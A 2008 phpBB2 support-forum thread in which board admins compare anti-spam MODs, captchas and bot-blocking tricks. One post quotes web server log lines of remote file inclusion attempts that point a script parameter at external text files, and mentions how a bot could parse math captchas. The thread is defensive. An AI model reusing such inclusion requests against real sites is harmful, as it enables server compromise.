phpBB2Refugees.com Logo
Not affiliated with or endorsed by the phpBB Group

Register •  Login 

Continue the legacy...

Welcome to all phpBB2 Refugees!Wave Smilie

This site is intended to continue support for the legacy 2.x line of the phpBB2 bulletin board package. If you are a fan of phpBB2, please, by all means register, post, and help us out by offering your suggestions. We are primarily a community and support network. Our secondary goal is to provide a phpBB2 MOD Author and Styles area.

What Anti-Spam measures do you use?
2 members found this topic helpful
Goto page 1, 2, 3, 4  Next
 
Search this topic... | Search phpBB2 Discussion... | Search Box
Register or Login to Post    Index » phpBB2 Discussion  Previous TopicPrint TopicNext Topic
Author Message
drathbun
Board Member



Joined: 24 Jul 2008

Posts: 653
Location: Texas


flag
PostPosted: Tue Dec 09, 2008 10:19 pm 
Post subject: What Anti-Spam measures do you use?

I don't think it's a secret that phpBB2 boards are a magnet for spammers. I talked about it at Londonvasion last summer, and have posted about the issue more than a few times on my blog. The phpBB2 CAPTCHA is worthless, you might as well not use it. There are various different MODs that can be added to your board in an attempt to thwart automatic spammers, but even then there are the manual spammers to contend with.

There is the RAC MOD, the VIP MOD, and various others. Are you using any of them? How have they been working out for you?

There are several reasons for me to ask this. First is curiousity. icon_smile.gif I like to hear what people are doing with their boards. Second, if there are some MODs that are overwhelmingly used over other choices, I will try to make sure that I contact the MOD author and get permission to post their MODs here.

_________________
phpBBDoctor Blog
Back to top
AsciiSector
Board Member



Joined: 09 Dec 2008

Posts: 30
Location: Copenhagen, Denmark


flag
PostPosted: Tue Dec 09, 2008 10:59 pm 
Post subject: Re: What Anti-Spam measures do you use?

I'm using the RAC MOD at my board. Haven't had a single bot in the ~6 months it's been active. I tried the Humanizer and reCaptcha MODs first, but the Humanizer MOD didn't seem to do much and I didn't like the reCaptcha MOD being dependent on another site to work. I really like the MOD you have to stop bots when registering here.
Back to top
dogs and things
Board Member



Joined: 18 Nov 2008

Posts: 621
Location: Spain


flag
PostPosted: Tue Dec 09, 2008 11:27 pm 
Post subject: Re: What Anti-Spam measures do you use?

I'm using the Anti Bot Question MOD. Allthough this MOD never made it past RC1 and is very complex I like it. It makes registering a bit more fun because it allows for funny pictures, funny questions about those pictures and a list of funny answers.

Apart from that, it also allows to be used for guest posting. As I have one forum where I want guest posting to be allowed so that users that have trouble with registering etc. can ask help there without having to be registered I need some effective anti-spam measure. And I must say that since I have this MOD installed I havenīt had a single spam register nor a single spam guest post.

I installed this MOD about 1 and a half year ago.

I guess my board being a Spanish board also helps a bit in avoiding spam. But before installing this MOD I had one or two spam registers a week and since then my board has experienced a pleasant increase in number of members and traffic.

_________________
phpBB2 will never die, I hope!
Back to top
Nightrider
Board Member



Joined: 10 Dec 2008

Posts: 41
Location: St Petersburg, FL


flag
PostPosted: Wed Dec 10, 2008 4:14 am 
Post subject: Re: What Anti-Spam measures do you use?

The Math Question during Registration MOD is one of the simplest and most effective MODs that I used to prevent spam bot registrations. Since a spam bot cannot answer a simple math question, they cannot get in. Of course this doesn't prevent human spammers from registering...

Image link
Back to top
drathbun
Board Member



Joined: 24 Jul 2008

Posts: 653
Location: Texas


flag
PostPosted: Wed Dec 10, 2008 4:24 am 
Post subject: Re: What Anti-Spam measures do you use?

I have actually seen posts that claim bots can use google to solve a math problem... for example, if your math problem was 3+5 then all the bot has to do is first recognize the problem, then plug it into google, like this:
Code:
3+5=

Try it yourself here:

http://www.google.com/search?hl=en&q=3%2B5%3D

Given that, it would not surprise me to find out that some bot writers were smart enough to be able to recognize a math challenge and solve it with help from google. icon_smile.gif

One of the things I have decided is that no matter what your solution is, it has to be easily changed or upgraded. The simple checkbox challenge that you had to solve to register here on this board is not only used here, but on my blog. It has worked for over a year and a half. But I've started seeing spam creep into my blog comments again, and there were some other comments that were "suspect", meaning they looked like spammers testing out a new algorithm.

So I'm working on the next twist to try to stay ahead, and that's part of why I posted this question.

_________________
phpBBDoctor Blog
Back to top
Nightrider
Board Member



Joined: 10 Dec 2008

Posts: 41
Location: St Petersburg, FL


flag
PostPosted: Wed Dec 10, 2008 4:53 am 
Post subject: Re: What Anti-Spam measures do you use?

With the Math Question MOD, you can change the question and answer at any time. It doesn't even have to be a math question. So if you see that spammers are getting wise to the question and/or are using Google to help answer the question, then you can change it at any time. The Math Question MOD could use a bit of upgrading to make it easier to change the question and answer, but it is simple enough to change it as is...

Since installing the Math Question MOD, it has almost eliminated all spam registrations in my community. And it is simple enough to recognize a spam registration, that using the Delete_User in Profile and Quick_Admin MODs, it is easy enough to delete them faster than they can register...

Also, the Zero Users MOD comes in handy. You can set it so that only active members are included in the member count and newest member display. It also removes all members from the memberlist who have never submitted any posts...

We rarely have to deal with spam posts or registrations in my community. I think they gave up trying realizing that they were wasting their time...

Image link
Back to top
Dog Cow
Board Member



Joined: 18 Nov 2008

Posts: 378


flag
PostPosted: Wed Dec 10, 2008 5:52 pm 
Post subject: Re: What Anti-Spam measures do you use?

Me: well, I turned off the Captcha in the registration page. I've also hidden the new post, reply, and quote links from guest users. Overall, my spam protection method is obscurity.

What drives me mad are the dumb-asses who send the brain-dead bots to my site, to exploit some software I've never once installed on my server.

Look at this:

Quote:
222.233.52.18 - - [04/Dec/2008:00:03:52 -0500] "GET //include/global.php?pfad=http://www.leegolf.com/vboard/data/test.txt??

77.221.130.16 - - [04/Dec/2008:00:12:45 -0500] "GET //include/global.php?pfad=http://forum.jj-nds-br.de/test.txt??

77.221.130.16 - - [04/Dec/2008:00:12:45 -0500] "GET /forums/programmers-plaza/a-big-bag-of-phpbb-speed-up-tips/t.1459//include/global.php?pfad=http://forum.jj-nds-br.de/test.txt??

How can you even expect that last one to work? I don't even use phpBB. That last URL is to a canonically-routed front-end MVC controller that powers the new forums code I've written. WTF??!!

And this exploit only came out last week: http://www.milw0rm.com/exploits/7335


drathbun wrote:
The phpBB2 CAPTCHA is worthless, you might as well not use it.

A decent replacement is the Advanced Visual Confirmation MOD from here. WARNING: It is vulnerable as soon as you install it. What you need to do is adjust the contrast and make all the letters AND background colors as dark as everything else. That is, no light, pastel tones.

How you test a captcha which puts "extra letters and colors/lines" is to take it in Photoshop (or some other photo editor) and adjust the threshold. On a weak captcha, everything but the letters you're supposed to enter will fade away. On a strong captcha, the extra "noise" (bogus letters, lines, etc.) will remain.

With some adjustments, you can make a strong(er) captcha.

Quote:
Since installing the Math Question MOD,

That's too easy to parse. Most "textual confirmation" systems are too easy to parse and evaluate. If you want better protection with a Q/A system, you'll have to pick obscure questions.

If it's math, I can use a regular expression to search for "What is 1 + 2?"
I can then use less than 5 lines of PHP code to resolve that to 3.
If you write "What is two plus five?" I can use a "look-up table" to turn the words into numbers.

Overall, I am of the opinion that math questions are easier to solve than image captchas.

Quote:

if your math problem was 3+5 then all the bot has to do is first recognize the problem, then plug it into google ... Given that, it would not surprise me to find out that some bot writers were smart enough to be able to recognize a math challenge and solve it with help from google. icon_smile.gif

No, that means they're morons who can't think of a way to parse and evaluate the expression on their own. That's like saying the thief who uses a calculator provided by a bank he's robbing to tot up the funds he's stealing (rather than do it mentally) is smarter than a thief who makes it out the door, then has his own calculator. If your solution relies on someone else, then you fail.

I've seen the stupid PHP scripts these people try to use in RFI attacks. They're childish spaghetti code. It's not even obsfucation, it's just someone who lacks experience big-time.

Yeah, there are some clever spammers/crackers out there, but it's like the entire world: more average, simpletons than anything else.

Here's one last tip: Spammers use a directory. That should be obvious, hopefully. Just like search engines use the DMOZ as a starting point, spammers have textfiles and other databases of sites.

If you see one forum is pretty popular for getting spam posts, doing a search may shock you. A few months ago, (since summer or before, IIRC) my "Cafe" general discussion forum got all the spam posts. The URL was this: macgui.com/forums/showcat.php?id=7 Not a typical phpBB URL. Here's the shocker: I did a Google search for that URL, and it turns out it was on some other web sites! These web sites were nothing but big long lists of URLs to start spamming at.
Back to top
Jim_UK
Board Member



Joined: 19 Nov 2008

Posts: 544
Location: North West UK


flag
PostPosted: Wed Dec 10, 2008 10:04 pm 
Post subject: Re: What Anti-Spam measures do you use?

VIP Mod and no bots in over 2 years.

Jim
Back to top
Nightrider
Board Member



Joined: 10 Dec 2008

Posts: 41
Location: St Petersburg, FL


flag
PostPosted: Thu Dec 11, 2008 5:50 am 
Post subject: Re: What Anti-Spam measures do you use?

Dog Cow wrote:
Overall, I am of the opinion that math questions are easier to solve than image captchas.

That is likely to be true. My biggest objective was to make it difficult for spam bots to register without making it more difficult for humans to do so. The photo captchas usually take a bit longer to navigate than a simple math question and there is more chance for error. I've seen photo captchas where they had you pick out all the pictured animals. If you get all but one, your registration fails. But a spam bot wouldn't even get one correct unless somehow it was coded to guess and it got lucky, so getting say 3 of the 4 correct pictures selected should have been enough to prove that a human was registering. But the code isn't smart enough to figure it out if the registrant was close to getting all correct selections...

I have had the Math Question MOD installed in my community for several years and we have absolutely no problems with spam bot registrations. It may not be the most complicated solution to the problem, but sometimes KISS is the best option IMO. Perhaps if my community was a whole lot more active, I might have to reconsider whether the Math Question MOD is the best option but as it stands now, I can't think of anything that works better for my community. The Math Question MOD is simple but effective for us. It may not be the best answer for all communities, but it is probably good enough for most...

Image link
Back to top
lumpy burgertushie
Board Member



Joined: 19 Nov 2008

Posts: 216


flag
PostPosted: Thu Dec 11, 2008 2:34 pm 
Post subject: Re: What Anti-Spam measures do you use?

I put up a vanilla test board earlier this year. I had not even visited it, much less made any changes to it, in several months. When I did, I found it full of spam bot registrations and also many, many spam posts.

I installed the RAC MOD like I have on all my clients boards and all my other boards, and not one single bot registration or post since.

I don't even make it hard to find the RAC code, I put it right there on the registration page and tell them to copy and paste it into the box.

I also read about making some changes to the time zone code and that seems to work as well.
Most bots simply pick the first thing in a list of options. ( like the time zones ).
Guess what, nobody lives in that first choice in the list. It is in the middle of the ocean.


robert
Back to top
Jim_UK
Board Member



Joined: 19 Nov 2008

Posts: 544
Location: North West UK


flag
PostPosted: Thu Dec 11, 2008 7:27 pm 
Post subject: Re: What Anti-Spam measures do you use?

lumpy burgertushie wrote:
I don't even make it hard to find the RAC code, I put it right there on the registration page


As do I with the VIP code one (virtually the same anyway) I see no reason to put folks off registering by making it harder for them.
I have installed this on 7 boards now and asked those owners of the others to tell me if even a single bot gets through. None reported yet.

Jim
Back to top
lumpy burgertushie
Board Member



Joined: 19 Nov 2008

Posts: 216


flag
PostPosted: Thu Dec 11, 2008 11:29 pm 
Post subject: Re: What Anti-Spam measures do you use?

Jim_UK wrote:
lumpy burgertushie wrote:
I don't even make it hard to find the RAC code, I put it right there on the registration page


As do I with the VIP code one (virtually the same anyway) I see no reason to put folks off registering by making it harder for them.
I have installed this on 7 boards now and asked those owners of the others to tell me if even a single bot gets through. None reported yet.

Jim

same here.

yes, the RAC MOD is an updated version of the VIP MOD as far as I know.


robert
Back to top
MarkTheDaemon
Board Member



Joined: 11 Nov 2008

Posts: 12
Location: United Kingdom


flag
PostPosted: Fri Dec 12, 2008 12:22 am 
Post subject: Re: What Anti-Spam measures do you use?

lumpy burgertushie wrote:
I put up a vanilla test board earlier this year. I had not even visited it, much less made any changes to it, in several months. When I did, I found it full of spam bot registrations and also many, many spam posts.


Welcome to the world of spam collection; something we are very familiar with over at bbProtection.

I'm currently running a few boards where the objective is simply to collect forum spam, and they do appear to just overrun any board they happen to come across.

As for anti-spam measures; I hope to say bbProtection a bit further down the line icon_cool.gif .


Mark
Back to top
drathbun
Board Member



Joined: 24 Jul 2008

Posts: 653
Location: Texas


flag
PostPosted: Fri Dec 12, 2008 12:40 am 
Post subject: Re: What Anti-Spam measures do you use?

Hi, Mark, I certainly expect that this site would be willing to beta test the bbProtection service. icon_smile.gif
_________________
phpBBDoctor Blog
Back to top
Nightrider
Board Member



Joined: 10 Dec 2008

Posts: 41
Location: St Petersburg, FL


flag
PostPosted: Fri Dec 12, 2008 2:02 am 
Post subject: Re: What Anti-Spam measures do you use?

lumpy burgertushie wrote:
I put up a vanilla test board earlier this year. I had not even visited it, much less made any changes to it, in several months. When I did, I found it full of spam bot registrations and also many, many spam posts.

That's interesting. I have a test vanilla board too installed on a subdomain that had several spam registrations and submissions in the last few days. It has been there for years without any problems, yet they just found it and started posting in it this week for some reason. I wouldn't even have thought to look if you hadn't mentioned your experience...

Image link
Back to top
Display posts from previous:   
Register or Login to Post    Index » phpBB2 Discussion  Previous TopicPrint TopicNext Topic
Page 1 of 4 All times are GMT
Goto page 1, 2, 3, 4  Next
 
Jump to:  

Index • About • FAQ • Rules • Privacy • Search •  Register •  Login 
Not affiliated with or endorsed by the phpBB Group
Powered by phpBB2 © phpBB Group
Generated in 0.0183 seconds using 15 queries. (SQL 0.0026 Parse 0.0007 Other 0.0150)
phpBB Customizations by the phpBBDoctor.com
Template Design by DeLFlo and MomentsOfLight.com Moments of Light Logo